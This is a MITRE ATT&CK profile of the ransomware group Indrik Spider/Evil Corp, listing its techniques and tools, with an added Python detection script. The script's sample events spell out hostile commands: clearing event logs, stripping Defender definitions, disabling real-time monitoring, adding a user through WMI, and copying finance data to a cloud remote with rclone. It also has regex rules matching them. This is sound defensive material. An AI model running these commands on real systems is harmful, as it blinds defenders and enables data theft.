G0119 Indrik Spider

Indrik Spider is a Russia-based cybercriminal group that has been active since at least 2014. Indrik Spider initially started with the Dridex banking Trojan, and then by 2017 they began running ransomware operations using BitPaymer, WastedLocker, and Hades ransomware. Following U.S. sanctions and an indictment in 2019, Indrik Spider changed their tactics and diversified their toolset.[1][4][5]

Item Value
ID G0119
Associated Names Evil Corp, Manatee Tempest, DEV-0243, UNC2165
Version 4.1
Created 06 January 2021
Last Modified 28 October 2024

Associated Group Descriptions

Name Citations
Evil Corp [4][5]
Manatee Tempest [3]
DEV-0243 [3]
UNC2165 [2]

Techniques Used

Domain ID Name Use
enterprise T1583 Acquire Infrastructure Indrik Spider has purchased access to victim VPNs to facilitate access to victim environments.[2]
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Indrik Spider has used PowerShell Empire for execution of malware.[1][6]
enterprise T1059.003 Windows Command Shell Indrik Spider has used batch scripts on victims' machines.[1][2]
enterprise T1059.007 JavaScript Indrik Spider has used malicious JavaScript files for several components of their attack.[6]
enterprise T1584 Compromise Infrastructure -
enterprise T1584.004 Server Indrik Spider has served fake updates via legitimate websites that have been compromised.[1]
enterprise T1136 Create Account Indrik Spider used wmic.exe to add a new user to the system.[6]
enterprise T1136.001 Local Account Indrik Spider has created local system accounts and has added the accounts to privileged groups.[2]
enterprise T1555 Credentials from Password Stores -
enterprise T1555.005 Password Managers Indrik Spider has accessed and exported passwords from password managers.[2]
enterprise T1486 Data Encrypted for Impact Indrik Spider has encrypted domain-controlled systems using BitPaymer.[1] Additionally, Indrik Spider used PsExec to execute a ransomware script.[2]
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging Indrik Spider has stored collected data in a .tmp file.[6]
enterprise T1587 Develop Capabilities -
enterprise T1587.001 Malware Indrik Spider has developed malware for their operations, including ransomware such as BitPaymer and WastedLocker.[1]
enterprise T1484 Domain or Tenant Policy Modification -
enterprise T1484.001 Group Policy Modification Indrik Spider has used Group Policy Objects to deploy batch scripts.[1][2]
enterprise T1585 Establish Accounts -
enterprise T1585.002 Email Accounts Indrik Spider has created email accounts to communicate with their ransomware victims, including providing payment and decryption details.[1]
enterprise T1567 Exfiltration Over Web Service -
enterprise T1567.002 Exfiltration to Cloud Storage Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware.[2]
enterprise T1590 Gather Victim Network Information Indrik Spider has downloaded tools, such as the Advanced Port Scanner utility and Lansweeper, to conduct internal reconnaissance of the victim network. Indrik Spider has also accessed the victim's VMware vCenter, which had information about host configuration, clusters, etc.[2]
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.[6] Indrik Spider has used MpCmdRun to revert the definitions in Microsoft Defender.[2] Additionally, Indrik Spider has used WMI to stop or uninstall and reset anti-virus products and other defensive services.[2]
enterprise T1070 Indicator Removal -
enterprise T1070.001 Clear Windows Event Logs Indrik Spider has used Cobalt Strike to empty log files.[6] Additionally, Indrik Spider has cleared all event logs using wevtutil.[2]
enterprise T1105 Ingress Tool Transfer Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.[1][6][2]
enterprise T1036 Masquerading -
enterprise T1036.005 Match Legitimate Resource Name or Location Indrik Spider used fake updates for the FlashPlayer plugin and Google Chrome as initial infection vectors.[1]
enterprise T1112 Modify Registry Indrik Spider has modified registry keys to prepare for ransomware execution and to disable common administrative utilities.[2]
enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory Indrik Spider used Cobalt Strike to carry out credential dumping using ProcDump.[6]
enterprise T1012 Query Registry Indrik Spider has used a service account to extract copies of the Security Registry hive.[2]
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol Indrik Spider has used RDP for lateral movement.[2]
enterprise T1021.004 SSH Indrik Spider has used SSH for lateral movement.[2]
enterprise T1018 Remote System Discovery Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.[6]
enterprise T1489 Service Stop Indrik Spider has used PsExec to stop services prior to the execution of ransomware.[6]
enterprise T1558 Steal or Forge Kerberos Tickets -
enterprise T1558.003 Kerberoasting Indrik Spider has conducted Kerberoasting attacks using a module from GitHub.[2]
enterprise T1007 System Service Discovery Indrik Spider has used the win32_service WMI class to retrieve a list of services from the system.[6]
enterprise T1552 Unsecured Credentials -
enterprise T1552.001 Credentials In Files Indrik Spider has searched files to obtain and exfiltrate credentials.[2]
enterprise T1204 User Execution -
enterprise T1204.002 Malicious File Indrik Spider has attempted to get users to click on a malicious zipped file.[6]
enterprise T1078 Valid Accounts Indrik Spider has used valid accounts for initial access and lateral movement.[2] Indrik Spider has also maintained access to the victim environment through the VPN infrastructure.[2]
enterprise T1078.002 Domain Accounts Indrik Spider has collected credentials from infected systems, including domain accounts.[1]
enterprise T1047 Windows Management Instrumentation Indrik Spider has used WMIC to execute commands on remote computers.[6]
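Several rows of the table above describe behaviours that leave a clear trace in process-creation telemetry: event logs cleared with wevtutil (T1070.001), Defender definitions reverted with MpCmdRun and real-time monitoring restricted (T1562.001), a local user added through wmic.exe (T1136/T1136.001), and Rclone used for exfiltration to cloud storage (T1567.002). The following detection script is an added example written for this page; it is not MITRE's code and not tooling from any of the cited reports. It assumes a flattened "host|user|image|commandline" record format and a constructed set of sample events, and the command-line patterns it matches are assumptions about how these behaviours commonly appear on the command line, not indicators taken from the page.

```python
import re
from dataclasses import dataclass

# Constructed sample of process-creation events (Sysmon Event ID 1 style),
# flattened to "host|user|image|commandline". These lines are synthetic and
# were written for this example; they are not telemetry from any intrusion.
SAMPLE_EVENTS = [
    "ws01|CORP\\jsmith|C:\\Windows\\System32\\wevtutil.exe|wevtutil cl Security",
    "ws01|CORP\\jsmith|C:\\Windows\\System32\\wevtutil.exe|wevtutil cl System",
    "srv02|CORP\\svc_backup|C:\\Program Files\\Windows Defender\\MpCmdRun.exe|MpCmdRun.exe -RemoveDefinitions -All",
    "srv02|CORP\\svc_backup|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic process call create \"net user helpdesk Placeholder1 /add\"",
    "srv02|CORP\\svc_backup|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Set-MpPreference -DisableRealtimeMonitoring $true",
    "srv03|CORP\\admin|C:\\Tools\\rclone.exe|rclone copy D:\\Finance mega:backup",
    "srv03|CORP\\admin|C:\\Windows\\System32\\cmd.exe|cmd /c dir",
    "ws01|CORP\\jsmith|C:\\Windows\\System32\\wevtutil.exe|wevtutil qe Security /c:5",
]

# Detection rules: (ATT&CK technique ID from the table above, short title,
# command-line pattern). The patterns are this example's assumptions about
# typical command-line shapes, kept deliberately narrow: "wevtutil qe"
# (querying a log) is benign and must not match the clear-log rule.
RULES = [
    ("T1070.001", "Windows event log cleared with wevtutil",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("T1562.001", "Defender definitions reverted with MpCmdRun",
     re.compile(r"MpCmdRun(\.exe)?.*-RemoveDefinitions", re.I)),
    ("T1562.001", "Defender real-time or download scanning disabled",
     re.compile(r"Set-MpPreference.*-Disable(RealtimeMonitoring|IOAVProtection)", re.I)),
    ("T1136.001", "Local account created through WMI process creation",
     re.compile(r"wmic.*process\s+call\s+create.*net\s+user.*/add", re.I)),
    ("T1567.002", "Rclone transfer to a cloud storage remote",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
]


@dataclass(frozen=True)
class Event:
    host: str
    user: str
    image: str
    commandline: str


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    technique: str
    title: str
    commandline: str


def parse_event(line: str) -> Event:
    """Split one flattened record; the command line may itself contain '|',
    so only the first three separators are significant."""
    host, user, image, commandline = line.split("|", 3)
    return Event(host, user, image, commandline)


def detect(lines) -> list:
    """Run every rule over the command line of every event and return one
    Finding per (event, rule) match, in input order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for technique, title, pattern in RULES:
            if pattern.search(ev.commandline):
                findings.append(Finding(ev.host, ev.user, technique, title, ev.commandline))
    return findings


def hosts_by_technique_count(findings, threshold: int = 2) -> dict:
    """Hosts on which at least `threshold` distinct techniques fired. The
    table above shows defence evasion, account creation and exfiltration
    clustered on the same systems shortly before ransomware deployment, so a
    host with several distinct hits is the one to triage first."""
    per_host = {}
    for f in findings:
        per_host.setdefault(f.host, set()).add(f.technique)
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= threshold}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.host:6} {f.technique:10} {f.title}: {f.commandline}")
    print("priority hosts:", hosts_by_technique_count(hits))
```

Run against the constructed sample, the script flags six events (two wevtutil clears, the MpCmdRun and Set-MpPreference changes, the WMI-driven account creation and the Rclone copy), ignores the benign `cmd /c dir` and `wevtutil qe` lines, and singles out srv02 because two distinct techniques fired there. In production the same rules would be fed from a SIEM query over Sysmon or Security 4688 events rather than from an inline list.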

Software

ID Name References Techniques
S0570 BitPaymer [1][4] Bypass User Account Control:Abuse Elevation Control Mechanism; Token Impersonation/Theft:Access Token Manipulation; Local Account:Account Discovery; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Windows Service:Create or Modify System Process; Data Encrypted for Impact; Execution Guardrails; Windows File and Directory Permissions Modification:File and Directory Permissions Modification; NTFS File Attributes:Hide Artifacts; Timestomp:Indicator Removal; Inhibit System Recovery; Modify Registry; Native API; Network Share Discovery; Encrypted/Encoded File:Obfuscated Files or Information; Query Registry; Remote System Discovery; System Service Discovery
S0154 Cobalt Strike [4][8][2] Sudo and Sudo Caching:Abuse Elevation Control Mechanism; Bypass User Account Control:Abuse Elevation Control Mechanism; Parent PID Spoofing:Access Token Manipulation; Token Impersonation/Theft:Access Token Manipulation; Make and Impersonate Token:Access Token Manipulation; Domain Account:Account Discovery; DNS:Application Layer Protocol; Web Protocols:Application Layer Protocol; File Transfer Protocols:Application Layer Protocol; BITS Jobs; Browser Session Hijacking; JavaScript:Command and Scripting Interpreter; Visual Basic:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Python:Command and Scripting Interpreter; Windows Command Shell:Command and Scripting Interpreter; Windows Service:Create or Modify System Process; Standard Encoding:Data Encoding; Data from Local System; Protocol or Service Impersonation:Data Obfuscation; Data Transfer Size Limits; Deobfuscate/Decode Files or Information; Asymmetric Cryptography:Encrypted Channel; Symmetric Cryptography:Encrypted Channel; Exploitation for Client Execution; Exploitation for Privilege Escalation; File and Directory Discovery; Process Argument Spoofing:Hide Artifacts; Disable or Modify Tools:Impair Defenses; Timestomp:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Modify Registry; Native API; Network Service Discovery; Network Share Discovery; Non-Application Layer Protocol; Indicator Removal from Tools:Obfuscated Files or Information; Obfuscated Files or Information; Office Template Macros:Office Application Startup; LSASS Memory:OS Credential Dumping; Security Account Manager:OS Credential Dumping; Domain Groups:Permission Groups Discovery; Local Groups:Permission Groups Discovery; Process Discovery; Dynamic-link Library Injection:Process Injection; Process Hollowing:Process Injection; Process Injection; Protocol Tunneling; Domain Fronting:Proxy; Internal Proxy:Proxy; Query Registry; Reflective Code Loading; Remote Desktop Protocol:Remote Services; SSH:Remote Services; Windows Remote Management:Remote Services; SMB/Windows Admin Shares:Remote Services; Distributed Component Object Model:Remote Services; Remote System Discovery; Scheduled Transfer; Screen Capture; Software Discovery; Code Signing:Subvert Trust Controls; Rundll32:System Binary Proxy Execution; System Network Configuration Discovery; System Network Connections Discovery; System Service Discovery; Service Execution:System Services; Pass the Hash:Use Alternate Authentication Material; Domain Accounts:Valid Accounts; Local Accounts:Valid Accounts; Windows Management Instrumentation
S0695 Donut [7] Web Protocols:Application Layer Protocol; Python:Command and Scripting Interpreter; Command and Scripting Interpreter; Visual Basic:Command and Scripting Interpreter; JavaScript:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Disable or Modify Tools:Impair Defenses; Indicator Removal; Ingress Tool Transfer; Native API; Encrypted/Encoded File:Obfuscated Files or Information; Software Packing:Obfuscated Files or Information; Compression:Obfuscated Files or Information; Process Discovery; Process Injection; Reflective Code Loading
S0384 Dridex [1][4][5] Web Protocols:Application Layer Protocol; Browser Session Hijacking; Symmetric Cryptography:Encrypted Channel; Asymmetric Cryptography:Encrypted Channel; DLL:Hijack Execution Flow; Native API; Obfuscated Files or Information; Proxy; Multi-hop Proxy:Proxy; Remote Access Tools; Scheduled Task:Scheduled Task/Job; Software Discovery; Regsvr32:System Binary Proxy Execution; System Information Discovery; Malicious File:User Execution
S0363 Empire [1] Bypass User Account Control:Abuse Elevation Control Mechanism; SID-History Injection:Access Token Manipulation; Access Token Manipulation; Create Process with Token:Access Token Manipulation; Domain Account:Account Discovery; Local Account:Account Discovery; LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle; Web Protocols:Application Layer Protocol; Archive Collected Data; Automated Collection; Automated Exfiltration; Security Support Provider:Boot or Logon Autostart Execution; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Shortcut Modification:Boot or Logon Autostart Execution; Browser Information Discovery; Clipboard Data; PowerShell:Command and Scripting Interpreter; Windows Command Shell:Command and Scripting Interpreter; Command and Scripting Interpreter; Local Account:Create Account; Domain Account:Create Account; Windows Service:Create or Modify System Process; Keychain:Credentials from Password Stores; Credentials from Web Browsers:Credentials from Password Stores; Group Policy Modification:Domain or Tenant Policy Modification; Domain Trust Discovery; Local Email Collection:Email Collection; Asymmetric Cryptography:Encrypted Channel; Accessibility Features:Event Triggered Execution; Exfiltration Over C2 Channel; Exfiltration to Code Repository:Exfiltration Over Web Service; Exfiltration to Cloud Storage:Exfiltration Over Web Service; Exploitation for Privilege Escalation; Exploitation of Remote Services; File and Directory Discovery; Group Policy Discovery; Path Interception by Unquoted Path:Hijack Execution Flow; Path Interception by Search Order Hijacking:Hijack Execution Flow; Path Interception by PATH Environment Variable:Hijack Execution Flow; Dylib Hijacking:Hijack Execution Flow; DLL:Hijack Execution Flow; Timestomp:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Credential API Hooking:Input Capture; Native API; Network Service Discovery; Network Share Discovery; Network Sniffing; Command Obfuscation:Obfuscated Files or Information; LSASS Memory:OS Credential Dumping; Process Discovery; Process Injection; Distributed Component Object Model:Remote Services; SSH:Remote Services; Scheduled Task:Scheduled Task/Job; Screen Capture; Security Software Discovery:Software Discovery; Kerberoasting:Steal or Forge Kerberos Tickets; Golden Ticket:Steal or Forge Kerberos Tickets; Silver Ticket:Steal or Forge Kerberos Tickets; System Information Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Owner/User Discovery; Service Execution:System Services; MSBuild:Trusted Developer Utilities Proxy Execution; Credentials In Files:Unsecured Credentials; Private Keys:Unsecured Credentials; Pass the Hash:Use Alternate Authentication Material; Video Capture; Bidirectional Communication:Web Service; Windows Management Instrumentation
S0002 Mimikatz [1][2] SID-History Injection:Access Token Manipulation; Account Manipulation; Security Support Provider:Boot or Logon Autostart Execution; Credentials from Password Stores; Credentials from Web Browsers:Credentials from Password Stores; Windows Credential Manager:Credentials from Password Stores; DCSync:OS Credential Dumping; Security Account Manager:OS Credential Dumping; LSASS Memory:OS Credential Dumping; LSA Secrets:OS Credential Dumping; Rogue Domain Controller; Steal or Forge Authentication Certificates; Golden Ticket:Steal or Forge Kerberos Tickets; Silver Ticket:Steal or Forge Kerberos Tickets; Private Keys:Unsecured Credentials; Pass the Hash:Use Alternate Authentication Material; Pass the Ticket:Use Alternate Authentication Material
S0029 PsExec [6] Domain Account:Create Account; Windows Service:Create or Modify System Process; Lateral Tool Transfer; SMB/Windows Admin Shares:Remote Services; Service Execution:System Services
S0612 WastedLocker [7][4][8][9] Bypass User Account Control:Abuse Elevation Control Mechanism; Windows Command Shell:Command and Scripting Interpreter; Windows Service:Create or Modify System Process; Data Encrypted for Impact; Deobfuscate/Decode Files or Information; File and Directory Discovery; Windows File and Directory Permissions Modification:File and Directory Permissions Modification; Hidden Files and Directories:Hide Artifacts; NTFS File Attributes:Hide Artifacts; DLL:Hijack Execution Flow; Inhibit System Recovery; Modify Registry; Native API; Network Share Discovery; Junk Code Insertion:Obfuscated Files or Information; Encrypted/Encoded File:Obfuscated Files or Information; Peripheral Device Discovery; Query Registry; Service Execution:System Services; System Checks:Virtualization/Sandbox Evasion

References

  1. Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021. 

  2. Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024. 

  3. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023. 

  4. Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021. 

  5. U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021. 

  6. Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021. 

  7. Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021. 

  8. Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023. 

  9. Milenkoski, A. (2022, November 7). SocGholish Diversifies and Expands Its Malware Staging Infrastructure to Counter Defenders. Retrieved March 22, 2024.